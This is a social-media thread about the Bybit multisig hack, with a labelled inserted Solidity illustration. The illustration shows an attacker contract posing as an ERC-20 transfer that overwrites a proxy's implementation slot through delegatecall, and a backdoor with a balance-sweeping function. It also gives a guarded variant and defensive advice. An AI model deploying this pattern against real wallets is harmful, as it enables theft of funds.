https://warpcast.com/~/channel/ethfinance
Thomas
@aviationdoctor.eth
What a crafty hack. Pyongyang is now on par with Dubai, New York, and Zug for being a hotspot of crypto innovation. If draining a multisig cold wallet managed by a competent professional team is now in the realm of possibilities, how can we expect corporates and normies to embrace the tech (let alone self-custody) without strong layer-0 guarantees and insurance? And if we do implement those, how is it not just TardFi and the FDIC with extra steps?
7 replies
36 recasts
187 reactions
TheModestThief🎩
@thief
is the postmortem out yet?
1 reply
0 recast
2 reactions
Thomas
@aviationdoctor.eth
IDK about a detailed formal PDF yet, but Bybit has explained that their multisig signatories had been hit with malware used to obfuscate the real transaction, which tampered with their smart contract. This is an S-tier supply chain attack.
1 reply
0 recast
10 reactions
Thomas
@aviationdoctor.eth
But also this suggests an upgradable smart contract, which sounds unnecessarily risky to me for a cold wallet. So I’d also want to know more
1 reply
0 recast
6 reactions
hollymolly.framedl.eth
@hollyr.eth
The attacker created a malicious contract containing a transfer function that used SSTORE operations to write to storage slot 0. When Bybit's multisig executed the delegatecall to what appeared to be a normal transfer, the malicious code was able to modify the proxy contract's implementation address, since delegatecall preserves the original contract's storage context. By writing to storage slot 0, which typically contains the implementation address in proxy patterns, the attacker changed the contract's logic implementation to point to their malicious contract.
1 reply
0 recast
2 reactions
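The mechanism described in the comment above, as an added illustration that is not part of the thread and not Safe's or Bybit's actual code: a simplified proxy that keeps its implementation pointer in storage slot 0, a wallet logic contract whose execTransaction supports a DelegateCall operation, an attacker contract whose function is named like an ERC-20 transfer but only does SSTORE to slot 0, and a Demo that runs the sequence. All contract and function names (Proxy, WalletLogic, MaliciousTransfer, Backdoor, Demo, execTransactionGuarded) are hypothetical.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

// Minimal proxy: slot 0 holds the implementation address. The fallback
// delegatecalls into it, so every SSTORE the called code performs lands
// in the proxy's own storage. (Simplified illustration, not Safe's code.)
contract Proxy {
    address internal implementation; // storage slot 0

    constructor(address impl) {
        implementation = impl;
    }

    fallback() external payable {
        address impl = implementation;
        assembly {
            calldatacopy(0, 0, calldatasize())
            let ok := delegatecall(gas(), impl, 0, calldatasize(), 0, 0)
            returndatacopy(0, 0, returndatasize())
            switch ok
            case 0 { revert(0, returndatasize()) }
            default { return(0, returndatasize()) }
        }
    }
}

// Wallet logic run in the proxy's storage context, so its layout mirrors
// the proxy's: slot 0 is the implementation pointer, slot 1 the owner.
contract WalletLogic {
    address internal implementation; // slot 0 (same as Proxy)
    address public owner;            // slot 1

    enum Operation { Call, DelegateCall }

    function init(address _owner) external {
        require(owner == address(0), "initialised");
        owner = _owner;
    }

    // With Operation.DelegateCall the target's code runs with THIS
    // contract's storage, i.e. the proxy's. That is the dangerous path.
    function _exec(address to, bytes calldata data, Operation op) internal returns (bool ok) {
        if (op == Operation.Call) {
            (ok, ) = to.call(data);
        } else {
            (ok, ) = to.delegatecall(data);
        }
    }

    // Vulnerable variant: no check on what the delegatecall did to storage.
    function execTransaction(address to, bytes calldata data, Operation op) external returns (bool ok) {
        require(msg.sender == owner, "not owner");
        ok = _exec(to, data, op);
        require(ok, "exec failed");
    }

    // Hardened variant (hypothetical): revert if slot 0 changed during execution.
    // This only protects the implementation pointer; a delegatecalled target can
    // still write any other slot, so an allowlist of delegatecall targets is the
    // stronger control.
    function execTransactionGuarded(address to, bytes calldata data, Operation op) external returns (bool ok) {
        require(msg.sender == owner, "not owner");
        address before = implementation;
        ok = _exec(to, data, op);
        require(ok, "exec failed");
        require(implementation == before, "implementation pointer changed");
    }
}

// Attacker contract. The selector looks like an ERC-20 transfer, but the body
// writes slot 0. `immutable` lives in bytecode, not storage, so it still reads
// correctly while executing inside the victim's storage context.
contract MaliciousTransfer {
    address private immutable newImpl;

    constructor(address _newImpl) {
        newImpl = _newImpl;
    }

    function transfer(address, uint256) external returns (bool) {
        address impl = newImpl;
        assembly {
            sstore(0, impl) // overwrite the proxy's implementation pointer
        }
        return true;
    }
}

// Code the attacker points the proxy at once slot 0 has been rewritten.
contract Backdoor {
    function sweep(address payable to) external {
        to.transfer(address(this).balance);
    }

    function whoAmI() external pure returns (string memory) {
        return "backdoor";
    }
}

// Runs the whole sequence in one transaction. Expected: guardedReverted == true
// (the guarded path rejects the swap), after_ == "backdoor" (the unguarded path
// leaves the proxy executing attacker code).
contract Demo {
    function run() external returns (bool guardedReverted, string memory after_) {
        WalletLogic logic = new WalletLogic();
        Proxy proxy = new Proxy(address(logic));
        WalletLogic wallet = WalletLogic(address(proxy));
        wallet.init(address(this));

        Backdoor backdoor = new Backdoor();
        MaliciousTransfer mal = new MaliciousTransfer(address(backdoor));
        bytes memory data = abi.encodeWithSignature("transfer(address,uint256)", address(this), 1);

        try wallet.execTransactionGuarded(address(mal), data, WalletLogic.Operation.DelegateCall) {
            guardedReverted = false;
        } catch {
            guardedReverted = true;
        }

        wallet.execTransaction(address(mal), data, WalletLogic.Operation.DelegateCall);
        after_ = Backdoor(address(proxy)).whoAmI();
    }
}
```

Deploy Demo and call run() in any EVM sandbox (Remix, Foundry, Hardhat). The point of the Demo is that the signers' view of the transaction (target plus a transfer(address,uint256) call) says nothing about what the target does with the storage it is handed; the check a practitioner would want is on the wallet side (refuse delegatecall to unvetted targets, or at least assert the implementation slot is unchanged) and on the signer side (decode and display the full calldata and operation type on the hardware signer rather than trusting the host UI).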
Thomas
@aviationdoctor.eth
Thanks for the explanation!
0 reply
0 recast
2 reactions